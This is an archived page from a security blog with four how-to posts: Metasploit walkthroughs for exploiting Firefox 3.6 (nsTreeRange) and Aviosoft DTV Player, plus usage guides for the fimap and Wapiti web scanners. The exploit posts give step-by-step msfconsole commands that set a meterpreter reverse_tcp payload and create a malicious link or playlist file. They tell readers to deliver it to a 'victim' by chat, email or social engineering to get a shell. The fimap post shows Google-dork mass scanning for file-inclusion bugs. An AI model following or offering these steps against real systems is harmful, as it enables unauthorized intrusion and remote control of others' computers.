Raj Chandel's Blog
Archive for June, 2012
Hack Remote PC using Mozilla Firefox “nsTreeRange” Dangling Pointer Vulnerability
011 months ago
This module exploits a code execution vulnerability in Mozilla Firefox 3.6.x <= 3.6.16 and 3.5.x <= 3.5.17 found in nsTreeSelection. By overwriting a subfunction of invalidate Selection it is possible to free the nsTreeRange object that the function currently operates on. Any further operations on the freed object can result in remote code execution. Utilizing the call setup the function provides it’s possible to bypass DEP without the need for a ROP. Sadly this exploit is still either dependent on Java or bound by ASLR because Firefox doesn’t employ any ASLR-free modules anymore.
Exploit Targets
Mozilla Firefox 3.6.16
Windows XP SP 2
Requirement
Attacker: Backtrack 5
Victim PC: Windows XP
Open backtrack terminal type msfconsole
Now type use exploit/windows/browser/mozilla_nstreerange
Msf exploit (mozilla_nstreerange)>set payload windows/meterpreter/reverse_tcp
Msf exploit (mozilla_nstreerange)>set lhost 192.168.1.4 (IP of Local Host)
Msf exploit (mozilla_nstreerange)>set srvhost 192.168.1.4 (This must be an address on the local machine)
Msf exploit (mozilla_nstreerange)>set uripath nstreerange (The Url to use for this exploit)
Msf exploit (mozilla_nstreerange)>exploit
Now an URL you should give to your victim http://192.168.1.4:8080/nstreerange
Send the link of the server to the victim via chat or email or any social engineering technique.
Now you have access to the victims PC. Use “Sessions -l” and the Session number to connect to the session. And Now Type “sessions -i ID“
LFI/RFI Testing and Exploiting with fimap
211 months ago
Fimap is a little python tool which can find, prepare, audit, exploit and even Google automatically for local and remote file inclusion bugs in webapps. Fimap should be something like sqlmap just for LFI/RFI bugs instead of sql injection. It’s currently under heavy development but it’s usable.
Open your backtrack terminal & Type
cd /pentest/web/fimap
Scan a single URL for FI errors
./fimap -u http://www.example.com/test.php?file=bang&id=23
Scan Google search results for FI errors
./fimap.py -g -q inurl:include.php
Harvest all links of a webpage
./fimap.py –H -u http://example.com–d 3 –w /tmp/urllist
- -m is for mass scanning
- -l is for list
- Scan websites using google dorks
- .fimap.py -g -q ‘inurl:include.php’
- -g for searching from google
- -q stands for the query which is to be searched in google.
Website: http://fimap.googlecode.com
Google+Hack Remote PC using Aviosoft Digital TV Player Professional 1.0 Stack Buffer Overflow
011 months ago
This module exploits a vulnerability found in Aviosoft Digital TV Player Pro version 1.x. An overflow occurs when the process copies the content of a playlist file on to the stack, which may result aribitrary code execution under the context of the user.
Exploit Targets
Aviosoft DTV Player 1.0.1.2
Windows XP SP 2
Requirement
Attacker: Backtrack 5
Victim PC: Windows XP
Open backtrack terminal type msfconsole
Now type use exploit/windows/fileformat/aviosoft_plf_buf
Msf exploit (aviosoft_plf_buf)>set payload windows/meterpreter/reverse_tcp
Msf exploit (aviosoft_plf_buf)>set lhost 192.168.1.2 (IP of Local Host)
Msf exploit (aviosoft_plf_buf)>exploit
After we successfully generate the malicious File, it will stored on your local computer
/root/.msf4/local/msf.plf
Now we need to set up a listener to handle reverse connection sent by victim when the exploit successfully executed.
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.1.2
exploit
Now send your msf.plf both files to victim, as soon as they download and open it. Now you can access meterpreter shell on victim computer
Wapiti – Web application vulnerability scanner
011 months ago
Wapiti allows you to audit the security of your web applications. It performs “black-box” scans, i.e. it does not study the source code of the application but will scans the WebPages of the deployed webapp, looking for scripts and forms where it can inject data. Once it gets this list, Wapiti acts like a fuzzer, injecting payloads to see if a script is vulnerable.
Wapiti can detect the following vulnerabilities:
- File Handling Errors (Local and remote include/require, fopen, readfile…)
- Database Injection (PHP/JSP/ASP SQL Injections and XPath Injections)
- XSS (Cross Site Scripting) Injection
- LDAP Injection
- Command Execution detection (eval (), system (), passtru()…)
- CRLF Injection (HTTP Response Splitting, session fixation…)
How to use wapiti
Open your backtrack terminal and type
cd /pentest/web/wapiti
Python wapiti.py http://example.com
The application generates a HTML Report in generated_report/index.html with contains a detailed information about the attacks performed and the vulnerabilities found.
